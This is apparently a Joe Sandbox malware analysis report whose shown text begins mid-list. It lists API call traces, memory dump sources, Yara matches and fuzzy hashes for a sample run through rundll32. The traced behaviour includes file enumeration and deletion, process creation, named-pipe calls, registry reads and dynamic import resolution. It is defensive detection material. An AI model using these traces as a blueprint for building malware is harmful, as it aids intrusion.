                                • HeapFree.KERNEL32(00000000,?), ref: 0343334B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$wsprintf$lstrlen$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID:
                                • API String ID: 967369141-0
                                • Opcode ID: 415fdb58a7f1ad7868ac639d6647fcd2ce3c619b58787d0f146d579d4445703d
                                • Instruction ID: 490befa98d894a67dfee2cd93d39c5a64e2c7ae55c32a9c7e9f5c9a26bb23034
                                • Opcode Fuzzy Hash: 415fdb58a7f1ad7868ac639d6647fcd2ce3c619b58787d0f146d579d4445703d
                                • Instruction Fuzzy Hash: 21A16775504304AFCB11EF65DC88E9ABBE8EB89714F090929F888EB260CB35D855CB56
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32 ref: 0348CED3
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0348CEEF
                                • GetLastError.KERNEL32 ref: 0348CF3E
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348CF54
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0348CF68
                                • GetLastError.KERNEL32 ref: 0348CF82
                                • GetLastError.KERNEL32 ref: 0348CFB5
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348CFD3
                                • lstrlenW.KERNEL32(00000000,?), ref: 0348CFFF
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0348D014
                                • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 0348D0E8
                                • HeapFree.KERNEL32(00000000,?), ref: 0348D0F7
                                • WaitForSingleObject.KERNEL32(00000000), ref: 0348D10C
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348D11F
                                • HeapFree.KERNEL32(00000000,?), ref: 0348D131
                                • RtlExitUserThread.NTDLL(?,?), ref: 0348D146
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                                • String ID:
                                • API String ID: 3853681310-3916222277
                                • Opcode ID: 847078a2eb65f298a06d4b9a50330a3e6248fd3c97b21e577cd3688c76ab7ffa
                                • Instruction ID: c68d599cfc4f2107899c58badab5123392b85f5b26e1660ce1a6dcd35543b988
                                • Opcode Fuzzy Hash: 847078a2eb65f298a06d4b9a50330a3e6248fd3c97b21e577cd3688c76ab7ffa
                                • Instruction Fuzzy Hash: 15813771900209AFDB11EFA5DC89EAEBBFCEB0A304F15046BF605EB294D7349945DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03491ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                  • Part of subcall function 03491ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                  • Part of subcall function 03491ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                  • Part of subcall function 03491ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 03472CA9
                                • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 03472CC7
                                • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 03472CF3
                                • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,00000000,?,00000000,?,?,?), ref: 03472D62
                                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03472DDA
                                • wsprintfA.USER32 ref: 03472DF6
                                • lstrlen.KERNEL32(00000000,00000000), ref: 03472E01
                                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03472E18
                                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03472EA4
                                • wsprintfA.USER32 ref: 03472EBF
                                • lstrlen.KERNEL32(00000000,00000000), ref: 03472ECA
                                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03472EE1
                                • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000000,?,?,?), ref: 03472F03
                                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03472F1E
                                • wsprintfA.USER32 ref: 03472F35
                                • lstrlen.KERNEL32(00000000,00000000), ref: 03472F40
                                  • Part of subcall function 03473172: lstrlen.KERNEL32(034743C6,00000000,?,?,?,?,034743C6,00000035,00000000,?,00000000), ref: 034731A2
                                  • Part of subcall function 03473172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 034731B8
                                  • Part of subcall function 03473172: memcpy.NTDLL(00000010,034743C6,00000000,?,?,034743C6,00000035,00000000), ref: 034731EE
                                  • Part of subcall function 03473172: memcpy.NTDLL(00000010,00000000,00000035,?,?,034743C6,00000035), ref: 03473209
                                  • Part of subcall function 03473172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 03473227
                                  • Part of subcall function 03473172: GetLastError.KERNEL32(?,?,034743C6,00000035), ref: 03473231
                                  • Part of subcall function 03473172: HeapFree.KERNEL32(00000000,00000000,?,?,034743C6,00000035), ref: 03473254
                                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03472F57
                                • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,06168A20), ref: 03472F83
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                                • String ID:
                                • API String ID: 3130754786-0
                                • Opcode ID: ed482388a055d99cd39a590b0b93c55a6720a68d78d33fdd7f7223246934f8c6
                                • Instruction ID: dffbf3979fde05acd1921f95691595213040273f4c94e954636c6afe7c1181ca
                                • Opcode Fuzzy Hash: ed482388a055d99cd39a590b0b93c55a6720a68d78d33fdd7f7223246934f8c6
                                • Instruction Fuzzy Hash: C2A167B1800209EFDB11EFA5DC88DAFBBB9FB19300B15486BE505BE210D7715E45DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlenW.KERNEL32(?), ref: 034811AA
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0348BB1D
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0348BB29
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BB71
                                  • Part of subcall function 0348BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BB8C
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(0000002C), ref: 0348BBC4
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?), ref: 0348BBCC
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BBEF
                                  • Part of subcall function 0348BAD1: wcscpy.NTDLL ref: 0348BC01
                                  • Part of subcall function 0348BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0348BC27
                                  • Part of subcall function 0348BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 0348BC5D
                                  • Part of subcall function 0348BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 0348BC79
                                  • Part of subcall function 0348BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0348BC92
                                  • Part of subcall function 0348BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0348BCA4
                                  • Part of subcall function 0348BAD1: FindClose.KERNEL32(?), ref: 0348BCB9
                                  • Part of subcall function 0348BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BCCD
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(0000002C), ref: 0348BCEF
                                • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 03481206
                                • memcpy.NTDLL(00000000,?,00000000), ref: 03481219
                                • lstrcpyW.KERNEL32(00000000,?), ref: 03481230
                                  • Part of subcall function 0348BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0348BD65
                                  • Part of subcall function 0348BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0348BD77
                                  • Part of subcall function 0348BAD1: FindClose.KERNEL32(?), ref: 0348BD92
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 0348125B
                                • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 03481273
                                • HeapFree.KERNEL32(00000000,00000000), ref: 034812CD
                                • lstrlenW.KERNEL32(00000000,?), ref: 034812F0
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03481302
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 03481376
                                • HeapFree.KERNEL32(00000000,?), ref: 03481386
                                  • Part of subcall function 0347AE7C: lstrlen.KERNEL32(0347E448,00000000,00000000,?,?,03487A5B,?,?,?,?,0347E448,?), ref: 0347AE8B
                                  • Part of subcall function 0347AE7C: mbstowcs.NTDLL ref: 0347AEA7
                                • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 034813AF
                                • lstrlenW.KERNEL32(0349B878,?), ref: 03481429
                                • DeleteFileW.KERNEL32(?,?), ref: 03481457
                                • HeapFree.KERNEL32(00000000,?), ref: 03481465
                                • HeapFree.KERNEL32(00000000,?), ref: 03481486
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                • String ID:
                                • API String ID: 72361108-0
                                • Opcode ID: 8f7e274122deecd80b5c2258edcd1946b575cde755139c7bf6d1282fa313af29
                                • Instruction ID: 2d751dff711a5994e0bfcabac0ec1c2da7b4a6a66e3ff8d1b6250b25793dfeb0
                                • Opcode Fuzzy Hash: 8f7e274122deecd80b5c2258edcd1946b575cde755139c7bf6d1282fa313af29
                                • Instruction Fuzzy Hash: AF9139B1500219BFDB11EFA5EC89CAF7BECEB1A740B094457F509EF215E2309946CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03487F9B
                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 03487FB8
                                • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 03488008
                                • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 03488012
                                • GetLastError.KERNEL32 ref: 0348801C
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348802D
                                • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0348804F
                                • HeapFree.KERNEL32(00000000,?), ref: 03488086
                                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0348809A
                                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 034880A3
                                • SuspendThread.KERNEL32(?), ref: 034880B2
                                • CreateEventA.KERNEL32(0349A1E8,00000001,00000000), ref: 034880C6
                                • SetEvent.KERNEL32(00000000), ref: 034880D3
                                • CloseHandle.KERNEL32(00000000), ref: 034880DA
                                • Sleep.KERNEL32(000001F4), ref: 034880ED
                                • ResumeThread.KERNEL32(?), ref: 03488111
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                                • String ID:
                                • API String ID: 1011176505-0
                                • Opcode ID: 1ffb776f207424ac543d480b353683df3db2eff290476e9c044aa736aa04951d
                                • Instruction ID: 02d4862f56bcd9cde452a252aa561de40446c356ef275b51f4632418dab922d7
                                • Opcode Fuzzy Hash: 1ffb776f207424ac543d480b353683df3db2eff290476e9c044aa736aa04951d
                                • Instruction Fuzzy Hash: E2417272800209EFCB11FFA5DC899AEBBF9FB16340B26406BE601BE214D7315995DB54
                                 Uniqueness
                                 • Uniqueness Score: -1.00%
                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • memset.NTDLL ref: 03475465
                                • StrChrA.SHLWAPI(?,0000000D), ref: 034754AB
                                • StrChrA.SHLWAPI(?,0000000A), ref: 034754B8
                                • StrChrA.SHLWAPI(?,0000007C), ref: 034754DF
                                • StrTrimA.SHLWAPI(?,03495FCC), ref: 034754F4
                                • StrChrA.SHLWAPI(?,0000003D), ref: 034754FD
                                • StrTrimA.SHLWAPI(00000001,03495FCC), ref: 03475513
                                • _strupr.NTDLL ref: 0347551A
                                • StrTrimA.SHLWAPI(?,?), ref: 03475527
                                • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 0347556F
                                • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 0347558E
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                                • String ID: $;
                                • API String ID: 4019332941-73438061
                                • Opcode ID: a600f49d9921d9c78e4d36a8ee58021b91fbaa4ce3130fe6972192962f7055b9
                                • Instruction ID: 96720c4e9639e9b3e33b255f87b14ca041506d7ca9f31a8edeb677dea1df8ece
                                • Opcode Fuzzy Hash: a600f49d9921d9c78e4d36a8ee58021b91fbaa4ce3130fe6972192962f7055b9
                                • Instruction Fuzzy Hash: 8B412171508302AFD711EF29CC44B5BBBE9AF4A240F08089FF4999F345DB74D9058BAA
                                 Uniqueness
                                 • Uniqueness Score: -1.00%
                                APIs
                                • wsprintfA.USER32 ref: 03482DF8
                                • OpenWaitableTimerA.KERNEL32(00100000,00000000,00000000), ref: 03482E0C
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,?), ref: 03482F37
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • memset.NTDLL ref: 03482E38
                                • GetLastError.KERNEL32(?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 03482E70
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateCloseErrorHandleHeapLastOpenTimerWaitablememsetwsprintf
                                • String ID: 0x%08X$W
                                • API String ID: 95801598-2600449260
                                • Opcode ID: b93e151d84ab4f9abc594695937d396294e7f2505b15e8d6d20ba4007671ae23
                                • Instruction ID: e88e489278e6e0fec151202598904a573f4c72900e03597a8e0325d92dff3238
                                • Opcode Fuzzy Hash: b93e151d84ab4f9abc594695937d396294e7f2505b15e8d6d20ba4007671ae23
                                • Instruction Fuzzy Hash: D85191B1500705AFDB11EF65C845BAEBBE8FF09314F20851AF959EE280D7B4D544CB98
                                 Uniqueness
                                 • Uniqueness Score: -1.00%
                                APIs
                                • memset.NTDLL ref: 0348C034
                                  • Part of subcall function 0347AE7C: lstrlen.KERNEL32(0347E448,00000000,00000000,?,?,03487A5B,?,?,?,?,0347E448,?), ref: 0347AE8B
                                  • Part of subcall function 0347AE7C: mbstowcs.NTDLL ref: 0347AEA7
                                • lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0348C06D
                                • wcstombs.NTDLL ref: 0348C077
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0348C0A8
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0347A645), ref: 0348C0D4
                                • TerminateProcess.KERNEL32(?,000003E5), ref: 0348C0EA
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0347A645), ref: 0348C0FE
                                • GetLastError.KERNEL32 ref: 0348C102
                                • GetExitCodeProcess.KERNEL32(?,00000001), ref: 0348C122
                                • CloseHandle.KERNEL32(?), ref: 0348C131
                                • CloseHandle.KERNEL32(?), ref: 0348C136
                                • GetLastError.KERNEL32 ref: 0348C13A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                                • String ID: D
                                • API String ID: 2463014471-2746444292
                                • Opcode ID: 5d89ee0326330400c46221697f9d24b6ee387589970b6aecc1ae0286a4954a00
                                • Instruction ID: b73334694bedeeedfd369024c6975b76ea37abb71936877611b456b5cf37b858
                                • Opcode Fuzzy Hash: 5d89ee0326330400c46221697f9d24b6ee387589970b6aecc1ae0286a4954a00
                                • Instruction Fuzzy Hash: 4041E7B5D00218BFDB12FFA5CDC59EEFBBCEB09244F2444AAE501BA200D6715E458BB4
                                 Uniqueness
                                 • Uniqueness Score: -1.00%
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 03474526
                                • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 03474545
                                • GetLastError.KERNEL32 ref: 034746F6
                                • GetLastError.KERNEL32 ref: 03474778
                                • SwitchToThread.KERNEL32(?,?,?,?), ref: 034747C1
                                • GetLastError.KERNEL32 ref: 03474813
                                • GetLastError.KERNEL32 ref: 03474822
                                • RtlEnterCriticalSection.NTDLL(?), ref: 03474832
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 03474843
                                • RtlExitUserThread.NTDLL(?), ref: 03474851
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 034748C0
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03474911
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 03474946
                                • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 03474956
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocAllocateCriticalFreeSectionThreadVirtual$EnterExitLeaveSwitchUser
                                • String ID:
                                • API String ID: 2794784202-0
                                • Opcode ID: 7f9cf6594ee644d4e4dc9d249e7c5eba763d840120e430416511759dd89de448
                                • Instruction ID: df4ef7cb0b1ec16f02e47b9e74fbbaf8f8db52392d895b44caada93ceb9cc502
                                • Opcode Fuzzy Hash: 7f9cf6594ee644d4e4dc9d249e7c5eba763d840120e430416511759dd89de448
                                • Instruction Fuzzy Hash: 61E14AB5500249AFEB20EF66CC88EEABBEDFF09304F24456AF915DA260D73099548F54
                                 Uniqueness
                                 • Uniqueness Score: -1.00%
                                APIs
                                • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0347C03F
                                • StrTrimA.SHLWAPI(00000001,?,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 0347C058
                                • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0347C063
                                • StrTrimA.SHLWAPI(00000001,?,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 0347C07C
                                • lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?), ref: 0347C11F
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0347C141
                                • lstrcpy.KERNEL32(00000020,?), ref: 0347C160
                                • lstrlen.KERNEL32(?,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?,00000000), ref: 0347C16A
                                • memcpy.NTDLL(?,?,?,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0347C1AB
                                • memcpy.NTDLL(?,?,?,?,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001), ref: 0347C1BE
                                • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057), ref: 0347C1E2
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,034885F1,?,00000000,0000001E), ref: 0347C201
                                • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?), ref: 0347C227
                                • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?), ref: 0347C243
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                • String ID:
                                • API String ID: 3323474148-0
                                • Opcode ID: 7222f82323ebd2039597be0284689ffe65423f396ff996a2376f04117aca08b4
                                • Instruction ID: 0c14747d55605c60b832704b177f2d981e413fd8669eae40a8ffdfcd37a6898d
                                • Opcode Fuzzy Hash: 7222f82323ebd2039597be0284689ffe65423f396ff996a2376f04117aca08b4
                                • Instruction Fuzzy Hash: 20716971504301AFC721EF65C881A9BBBE8FB49304F09492FF599EB250D731D945CB96
                                 Uniqueness
                                 • Uniqueness Score: -1.00%
                                APIs
                                • lstrlen.KERNEL32(?,?,00000000), ref: 034805D3
                                • lstrlen.KERNEL32(?,?,00000000), ref: 034805DA
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 034805F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 03480602
                                • lstrcat.KERNEL32(?,?), ref: 0348061E
                                • lstrcat.KERNEL32(?,?), ref: 0348062F
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03480640
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 034806DD
                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 03480716
                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0348072F
                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 03480739
                                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 03480749
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 03480762
                                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 03480772
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                • String ID:
                                • API String ID: 333890978-0
                                • Opcode ID: 81c49972dc1ec58761367efd7dbe9363af2e0c1247b54399ae7b014a5d5eb370
                                • Instruction ID: 14d8cec971c213a62fcdabac442627d89739d1d46092d2059dc69c7dfebf2538
                                • Opcode Fuzzy Hash: 81c49972dc1ec58761367efd7dbe9363af2e0c1247b54399ae7b014a5d5eb370
                                • Instruction Fuzzy Hash: 6A517C76400108BFDB12BFA4DC84CAEBBFDFF59244B1A4467FA05AB224D6319A499F50
                                 Uniqueness
                                 • Uniqueness Score: -1.00%
                                APIs
                                • lstrlenW.KERNEL32(?,00000000,?,?,?,0347663D,?,?), ref: 0348AFCF
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0347663D,?,?), ref: 0348AFF8
                                • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0348B018
                                • lstrcpyW.KERNEL32(-00000002,?), ref: 0348B034
                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0347663D,?,?), ref: 0348B040
                                • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0347663D,?,?), ref: 0348B043
                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0347663D,?,?), ref: 0348B04F
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0348B06C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0348B086
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0348B09C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0348B0B2
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0348B0C8
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0348B0DE
                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,0347663D,?,?), ref: 0348B107
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                • String ID:
                                • API String ID: 3772355505-0
                                • Opcode ID: 36db9d44152b6802bb023545ad316b4ed28aef3ed97f8bb454eeeb2fcf13b00a
                                • Instruction ID: 965e4847766e965970c9472696ab13c05c3ad3084988140aa45a51d6b59becbf
                                • Opcode Fuzzy Hash: 36db9d44152b6802bb023545ad316b4ed28aef3ed97f8bb454eeeb2fcf13b00a
                                • Instruction Fuzzy Hash: DD3187B150421AAFD711FF24EC85D6BBBECEF09244B04842BE805DF251EB34E801CBA4
                                 Uniqueness
                                 • Uniqueness Score: -1.00%
                                APIs
                                • lstrlenW.KERNEL32(?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D02D
                                • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D038
                                • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D040
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0347D055
                                • lstrcpyW.KERNEL32(00000000,?), ref: 0347D066
                                • lstrcatW.KERNEL32(00000000,?), ref: 0347D078
                                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D07D
                                • lstrcatW.KERNEL32(00000000,034953E0), ref: 0347D089
                                • lstrcatW.KERNEL32(00000000), ref: 0347D092
                                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D097
                                • lstrcatW.KERNEL32(00000000,034953E0), ref: 0347D0A3
                                • lstrcatW.KERNEL32(00000000,00000002), ref: 0347D0BF
                                • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D0C7
                                • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D0D5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
